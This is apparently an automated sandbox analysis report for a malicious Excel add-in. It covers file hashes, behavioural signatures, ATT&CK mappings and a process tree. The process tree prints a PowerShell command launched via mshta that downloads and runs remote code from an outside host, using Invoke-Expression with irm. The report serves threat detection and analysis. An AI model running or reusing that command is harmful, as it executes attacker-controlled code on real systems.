Analysis

  • max time kernel
    143s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 20:36

General

  • Target

    db2b9f294b9cabc92aed4e840bf635fe3ac924f62e7043c2549840adde00e55c.xll

  • Size

    12KB

  • MD5

    b54f29afbebe0ee91ead7d1028a4c80a

  • SHA1

    5a71e236365b4d49a9d1dfad28edbaa925cc6650

  • SHA256

    db2b9f294b9cabc92aed4e840bf635fe3ac924f62e7043c2549840adde00e55c

  • SHA512

    0121b4b65e57ae207c7cf24c915a3ffd1b2cf039f3fedd0ee9c812beb57e14181abd8031c88a56f1966733b02f8afa42d6cc954f9ddcc84d1f842bf45e7cd44b

  • SSDEEP

    192:oL29RBzDzeobchBj8JONvONPruZrEPEjr7AhY:m29jnbcvYJOw9uZvr7CY

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\db2b9f294b9cabc92aed4e840bf635fe3ac924f62e7043c2549840adde00e55c.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1936

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GO42234Z\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wqzn4siy.bgo.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\db2b9f294b9cabc92aed4e840bf635fe3ac924f62e7043c2549840adde00e55c.xll
    Filesize

    12KB

    MD5

    b54f29afbebe0ee91ead7d1028a4c80a

    SHA1

    5a71e236365b4d49a9d1dfad28edbaa925cc6650

    SHA256

    db2b9f294b9cabc92aed4e840bf635fe3ac924f62e7043c2549840adde00e55c

    SHA512

    0121b4b65e57ae207c7cf24c915a3ffd1b2cf039f3fedd0ee9c812beb57e14181abd8031c88a56f1966733b02f8afa42d6cc954f9ddcc84d1f842bf45e7cd44b

  • memory/1936-61-0x0000000006940000-0x000000000698C000-memory.dmp
    Filesize

    304KB

  • memory/1936-60-0x0000000006910000-0x000000000692E000-memory.dmp
    Filesize

    120KB

  • memory/1936-59-0x0000000006320000-0x0000000006674000-memory.dmp
    Filesize

    3.3MB

  • memory/1936-62-0x0000000007E20000-0x000000000849A000-memory.dmp
    Filesize

    6.5MB

  • memory/1936-49-0x00000000062B0000-0x0000000006316000-memory.dmp
    Filesize

    408KB

  • memory/1936-48-0x0000000006240000-0x00000000062A6000-memory.dmp
    Filesize

    408KB

  • memory/1936-47-0x0000000005970000-0x0000000005992000-memory.dmp
    Filesize

    136KB

  • memory/1936-46-0x00000000059E0000-0x0000000006008000-memory.dmp
    Filesize

    6.2MB

  • memory/1936-45-0x0000000005370000-0x00000000053A6000-memory.dmp
    Filesize

    216KB

  • memory/1936-63-0x00000000077E0000-0x00000000077FA000-memory.dmp
    Filesize

    104KB

  • memory/2956-10-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-8-0x00007FFF7B840000-0x00007FFF7B850000-memory.dmp
    Filesize

    64KB

  • memory/2956-15-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-18-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-20-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-21-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-19-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-17-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-16-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-14-0x00007FFF7B840000-0x00007FFF7B850000-memory.dmp
    Filesize

    64KB

  • memory/2956-11-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-12-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-0-0x00007FFF7DB70000-0x00007FFF7DB80000-memory.dmp
    Filesize

    64KB

  • memory/2956-13-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-9-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-7-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-6-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-5-0x00007FFFBDB8D000-0x00007FFFBDB8E000-memory.dmp
    Filesize

    4KB

  • memory/2956-4-0x00007FFF7DB70000-0x00007FFF7DB80000-memory.dmp
    Filesize

    64KB

  • memory/2956-3-0x00007FFF7DB70000-0x00007FFF7DB80000-memory.dmp
    Filesize

    64KB

  • memory/2956-1-0x00007FFF7DB70000-0x00007FFF7DB80000-memory.dmp
    Filesize

    64KB

  • memory/2956-2-0x00007FFF7DB70000-0x00007FFF7DB80000-memory.dmp
    Filesize

    64KB

  • memory/2956-73-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2956-92-0x00007FFF7DB70000-0x00007FFF7DB80000-memory.dmp
    Filesize

    64KB

  • memory/2956-91-0x00007FFF7DB70000-0x00007FFF7DB80000-memory.dmp
    Filesize

    64KB

  • memory/2956-90-0x00007FFF7DB70000-0x00007FFF7DB80000-memory.dmp
    Filesize

    64KB

  • memory/2956-89-0x00007FFF7DB70000-0x00007FFF7DB80000-memory.dmp
    Filesize

    64KB

  • memory/2956-93-0x00007FFFBDAF0000-0x00007FFFBDCE5000-memory.dmp
    Filesize

    2.0MB